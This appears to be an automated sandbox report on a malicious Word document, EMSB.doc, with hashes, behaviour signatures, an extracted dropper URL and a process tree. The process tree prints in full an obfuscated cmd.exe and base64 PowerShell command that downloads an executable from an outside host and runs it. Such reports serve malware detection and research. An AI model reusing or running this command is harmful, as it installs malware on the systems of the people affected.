Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 17:45

General

  • Target

    EMSB.doc

  • Size

    114KB

  • MD5

    754dc2d09d30c6e9d51a08feb7396dcc

  • SHA1

    f17f2e77515157a1f07338571ffc55db8a2d1573

  • SHA256

    1df932207319ad8505a88a915c3bbf5eb11fd12dba6d921cd107ef497da25692

  • SHA512

    a69edd08a95888287841461ee19508b5e03063052240911f1ebd4cb74f23bb3e40b6f980edce5e1d476498c4cfcc61b091f6173b20785aec916b54e59c6ec8fd

  • SSDEEP

    1536:/9F+u6qHEmcutqTRE23B9bEfAl/eDW3+jYrqCEtvaaeeAbgy1oZUeB6:/+u6Ict73PbE4xrLKngUUeU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kotobelamx.com/DAB/nerimf.php?l=willow2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\EMSB.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2932
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^r^A^G^8^A^d^A^B^v^A^G^I^A^Z^Q^B^s^A^G^E^A^b^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^E^A^E^E^A^Q^g^A^v^A^G^4^A^Z^Q^B^y^A^G^k^A^b^Q^B^m^A^C^4^A^c^A^B^o^A^H^A^A^P^w^B^s^A^D^0^A^d^w^B^p^A^G^w^A^b^A^B^v^A^H^c^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^I^A^M^Q^A^0^A^D^M^A^M^Q^A^z^A^D^Q^A^M^w^A^2^A^D^I^A^M^A^A^3^A^D^Q^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^M^g^A^x^A^D^Q^A^M^w^A^x^A^D^M^A^N^A^A^z^A^D^Y^A^M^g^A^w^A^D^c^A^N^A^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^D^s^A
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          pOweRsHeLL.exe -EC KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBrAG8AdABvAGIAZQBsAGEAbQB4AC4AYwBvAG0ALwBEAEEAQgAvAG4AZQByAGkAbQBmAC4AcABoAHAAPwBsAD0AdwBpAGwAbABvAHcAMgAuAHAAYQBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAxADIAMQA0ADMAMQAzADQAMwA2ADIAMAA3ADQAMQAuAGUAeABlAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADEAMgAxADQAMwAxADMANAAzADYAMgAwADcANAAxAC4AZQB4AGUALgBlAHgAZQAnADsAIABFAHgAaQB0ADsA
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:572

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4b697633ffdf60590f6ac6e0e4c556a8

      SHA1

      76e41442551b7f9407d11ac0eead5801f27d1ebe

      SHA256

      1cbb035b982018e1fa004360bf928477d0c5ad94a23e7ea1156735d68c4116ef

      SHA512

      cfe10b6bf63ebefb21101a53d53ef848bfc6abeb55c2d79120980886c7d95310be284f909c020af1015f151acff7fe2aafbaa9ce7335a4dab456387d5e5ab589

    • memory/2036-0-0x000000002F321000-0x000000002F322000-memory.dmp

      Filesize

      4KB

    • memory/2036-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-2-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB

    • memory/2036-11-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB

    • memory/2036-19-0x00000000054C0000-0x00000000055C0000-memory.dmp

      Filesize

      1024KB

    • memory/2036-18-0x00000000054C0000-0x00000000055C0000-memory.dmp

      Filesize

      1024KB

    • memory/2036-36-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-37-0x00000000713FD000-0x0000000071408000-memory.dmp

      Filesize

      44KB